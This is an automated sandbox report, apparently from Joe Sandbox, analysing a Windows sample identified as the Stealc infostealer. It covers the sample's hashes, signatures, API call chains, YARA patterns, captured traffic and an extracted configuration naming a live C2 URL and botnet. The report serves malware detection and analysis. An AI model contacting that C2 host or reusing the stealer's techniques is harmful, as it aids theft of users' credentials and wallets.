Edit tour

Windows Analysis Report
kNp6KbvVoz.exe

Overview

General Information

Sample name:	kNp6KbvVoz.exe renamed because original name is a hash value
Original sample name:	0c6e0d5c6de6558eab55ce5fad0b8acd.exe
Analysis ID:	1544233
MD5:	0c6e0d5c6de6558eab55ce5fad0b8acd
SHA1:	7854ebd877d57d4cb951adc174b5d463e0140688
SHA256:	49432b3c2186b051d35f09423075574cc82dbac403e5a69f311d4451a5a0e3b4
Tags:	32exetrojan
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Machine Learning detection for sample

Searches for specific processes (likely to inject)

AV process strings found (often used to terminate AV products)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

One or more processes crash

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

kNp6KbvVoz.exe (PID: 6920 cmdline: "C:\Users\user\Desktop\kNp6KbvVoz.exe" MD5: 0C6E0D5C6DE6558EAB55CE5FAD0B8ACD)

WerFault.exe (PID: 6332 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6920 -s 1332 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://194.15.46.65/7e57db3b864b30f1.php", "Botnet": "LogsDiller"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2089783465.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2089738538.0000000002E39000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1678:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.1693042238.00000000049A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: kNp6KbvVoz.exe PID: 6920	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: kNp6KbvVoz.exe PID: 6920	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.kNp6KbvVoz.exe.400000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.3.kNp6KbvVoz.exe.49a0000.1.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.3.kNp6KbvVoz.exe.49a0000.1.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.kNp6KbvVoz.exe.48c0e67.2.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.kNp6KbvVoz.exe.400000.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.kNp6KbvVoz.exe.48c0e67.2.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 1 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: kNp6KbvVoz.exe

Avira: detected

Found malware configuration

Source: 00000000.00000003.1693042238.00000000049A0000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: StealC {"C2 url": "http://194.15.46.65/7e57db3b864b30f1.php", "Botnet": "LogsDiller"}

Multi AV Scanner detection for domain / URL

Source: http://194.15.46.65/7e57db3b864b30f1.php

Virustotal: Detection: 16%

Perma Link

Multi AV Scanner detection for submitted file

Source: kNp6KbvVoz.exe	ReversingLabs: Detection: 73%
Source: kNp6KbvVoz.exe	Virustotal: Detection: 61%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: kNp6KbvVoz.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_00419030 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	0_2_00419030
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0040C920 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,	0_2_0040C920
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0040A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_0040A210
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_004072A0 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_004072A0
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0040A2B0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	0_2_0040A2B0
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048CA477 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_048CA477
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048C7507 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_048C7507
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048CA517 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	0_2_048CA517
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048D9297 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_048D9297
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048CCB87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,	0_2_048CCB87

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe

Unpacked PE file: 0.2.kNp6KbvVoz.exe.400000.0.unpack

Source: kNp6KbvVoz.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: my_library.pdbU source: kNp6KbvVoz.exe, 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, kNp6KbvVoz.exe, 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, kNp6KbvVoz.exe, 00000000.00000003.1693042238.00000000049A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: my_library.pdb source: kNp6KbvVoz.exe, kNp6KbvVoz.exe, 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, kNp6KbvVoz.exe, 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, kNp6KbvVoz.exe, 00000000.00000003.1693042238.00000000049A0000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_004140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	0_2_004140F0
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0040E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040E530
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0040BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040BE40
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0040EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0040EE20
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_00414B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00414B60
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_00413B00 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00413B00
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0040DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040DF10
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00401710
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_004147C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	0_2_004147C0
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0040DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040DB80
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0040F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040F7B0
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048CE797 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_048CE797
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048CF087 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_048CF087
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048CC0A7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_048CC0A7
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048CE177 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_048CE177
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048D4357 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_048D4357
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048D4DC7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_048D4DC7
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048CDDE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_048CDDE7
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048D3D67 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_048D3D67
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048C1977 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_048C1977
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048CFA17 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_048CFA17
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048D4A27 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_048D4A27

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://194.15.46.65/7e57db3b864b30f1.php

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 194.15.46.65Connection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View

IP Address: 194.15.46.65 194.15.46.65

Source: Joe Sandbox View

ASN Name: VENUS-INTERNET-ASGB VENUS-INTERNET-ASGB

Source: unknown	TCP traffic detected without corresponding DNS query: 194.15.46.65
Source: unknown	TCP traffic detected without corresponding DNS query: 194.15.46.65
Source: unknown	TCP traffic detected without corresponding DNS query: 194.15.46.65
Source: unknown	TCP traffic detected without corresponding DNS query: 194.15.46.65
Source: unknown	TCP traffic detected without corresponding DNS query: 194.15.46.65

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe

Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,KiUserExceptionDispatcher,InternetCloseHandle,InternetCloseHandle,

0_2_00405000

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 194.15.46.65Connection: Keep-AliveCache-Control: no-cache

Source: kNp6KbvVoz.exe, 00000000.00000002.2089693088.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.15.46.65
Source: kNp6KbvVoz.exe, 00000000.00000002.2089783465.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.15.46.65/
Source: kNp6KbvVoz.exe, 00000000.00000002.2089783465.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.15.46.65/#
Source: kNp6KbvVoz.exe, 00000000.00000002.2089783465.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.15.46.65/#Q-
Source: kNp6KbvVoz.exe, 00000000.00000002.2089783465.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.15.46.65/D
Source: kNp6KbvVoz.exe, 00000000.00000002.2089783465.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.15.46.65/_Q
Source: kNp6KbvVoz.exe, 00000000.00000002.2089693088.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.15.46.65/stemDrive=C:SystemRoot=L
Source: kNp6KbvVoz.exe, 00000000.00000002.2089693088.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.15.46.65b
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: kNp6KbvVoz.exe, kNp6KbvVoz.exe, 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, kNp6KbvVoz.exe, 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, kNp6KbvVoz.exe, 00000000.00000003.1693042238.00000000049A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe

Code function: 0_2_00409E30 memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcpy,memset,CreateProcessA,Sleep,CloseDesktop,

0_2_00409E30

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2089738538.0000000002E39000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048FF4FF	0_2_048FF4FF
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048F159F	0_2_048F159F
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0491A5FF	0_2_0491A5FF
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_049036EF	0_2_049036EF
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0494A76F	0_2_0494A76F
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0493A08F	0_2_0493A08F
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0492A19F	0_2_0492A19F
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048F11DF	0_2_048F11DF
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0491B1CF	0_2_0491B1CF
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_049082DF	0_2_049082DF
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0493134F	0_2_0493134F
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_04935C00	0_2_04935C00
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0491AD0F	0_2_0491AD0F
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0492ED3D	0_2_0492ED3D
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0492FFEF	0_2_0492FFEF
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0493C805	0_2_0493C805
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_048ED9AB	0_2_048ED9AB
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_04939AAF	0_2_04939AAF
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_0492CA0F	0_2_0492CA0F
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_04903A0F	0_2_04903A0F
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_04905B2F	0_2_04905B2F
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Code function: 0_2_04948B64	0_2_04948B64

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe

Code function: String function: 00404610 appears 317 times

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6920 -s 1332

Source: kNp6KbvVoz.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2089738538.0000000002E39000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: kNp6KbvVoz.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@2/5@0/1

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe

Code function: 0_2_00418810 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_00418810

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe

Code function: 0_2_00413970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00413970

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6920

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\df2b92f1-6bed-49e9-b919-bd1c53e138c2

Jump to behavior

Source: kNp6KbvVoz.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: kNp6KbvVoz.exe	ReversingLabs: Detection: 73%
Source: kNp6KbvVoz.exe	Virustotal: Detection: 61%

Source: unknown	Process created: C:\Users\user\Desktop\kNp6KbvVoz.exe "C:\Users\user\Desktop\kNp6KbvVoz.exe"
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6920 -s 1332

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\kNp6KbvVoz.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: my_library.pdbU source: kNp6KbvVoz.exe, 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, kNp6KbvVoz.exe, 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, kNp6KbvVoz.exe, 00000000.00000003.1693042238.00000000049A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: my_library.pdb source: kNp6KbvVoz.exe, kNp6KbvVoz.exe, 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, kNp6KbvVoz.exe, 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, kNp6KbvVoz.exe, 00000000.00000003.1693042238.00000000049A0000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe

Unpacked PE file: 0.2.kNp6KbvVoz.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.pewume:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe

Unpacked PE file: 0.2.kNp6KbvVoz.exe.400000.0.unpack

Source: C:\Users\user\Desktop\kNp6KbvVoz.exe

